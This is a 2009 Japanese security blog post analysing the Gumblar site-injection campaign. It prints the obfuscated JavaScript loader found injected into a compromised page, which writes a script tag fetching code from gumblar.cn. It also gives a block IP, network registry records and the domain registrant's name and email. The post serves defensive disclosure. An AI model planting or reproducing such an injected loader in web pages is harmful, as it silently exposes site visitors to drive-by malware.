UnderForge of Lack

* gumblar.cn 騒ぎの基点 *

gumblar。cnで調べていたら

Analysis report for .......

＜script src=／／gumblar。cn／rss／?id=＞＜/script＞


TOP PAGE_html : MD5:086a0a345ffb0920c7b7d4db3893b6a2 (3/37)
＜!--
(ｆunction(t){ｅval(ｕnescape(('var#20a#3d#22S#63ript#45ngine
#22#2cb#3d#22Ver#73ion(#29+#22#2cj#3d#22#22#2cu#3dnav#69#67at
#6fr#2e#75se#72#41gen#74#3bi#66#28(u#2eind#65x#4ff(#22Win#22)
#3e0)#26#26#28u#2ei#6e#64#65xO#66(#22NT#206#22#29#3c0)#26#26(
#64ocume#6e#74#2ecookie#2e#69ndexOf#28#22m#69#65k#3d1#22)#3c
#30)#26#26(#74ypeof(zrvzts#29#21#3dtyp#65of(#22#41#22#29))#7
bzrvz#74s#3d#22A#22#3b#65val(#22if(window#2e#22+a+#22)j#3dj+#
22+a#2b#22Major#22+b+a+#22Minor#22+#62#2ba+#22Bui#6c#64#22#2b
b+#22j#3b#22)#3b#64ocum#65n#74#2ewrite(#22#3cs#63ri#70t#20#73
r#63#3d#2f#2fgu#6dbl#61r#2e#63n#2frs#73#2f#3fi#64#3d#22+#6a+#2
2#3e#3c#5c#2fs#63r#69pt#3e#22#29#3b#7d').
ｒeplace(t,'%')))})(/#/g);
--＞

他にもまだあるかもしれませんので注意を

Block:
94.229.65.172 正引きが復活してきました

inetnum: 94.229.65.160 - 94.229.65.191
netname: LIMIT-SUREHOST-IP-3
descr: LIMIT SUREHOST IP RANGE 3
country: RU
狭くて不安ってヒトは

route: 94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
descr: UK Dedicated Servers Limited
origin: AS42831
mnt-by: UKSERVERS-MNT
source: RIPE # Filtered

zlkon(ウクライナグループ）が封鎖されたので、散布元を変えてきた可能性もあります。

----------
レジストラ:
Registrant Organization: NetworkProtect
Registrant Name: TiankaiCui
Administrative Email: cuitiankai＠googlemail.com

MDL(Malware Domain List)での検索結果：
Result : "cuitiankai" DESC

2009/04/12_00:00 botlife。cn／stats。php 94.247.2.57 hs.2-57.zlkon.lv exploits/trojan TiankaiCui cuitiankai@googlemail.com

をい（笑）

This entry was posted on 土曜日, 5 月 2nd, 2009 at 8:44 AM and is filed under RiskHedge, security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.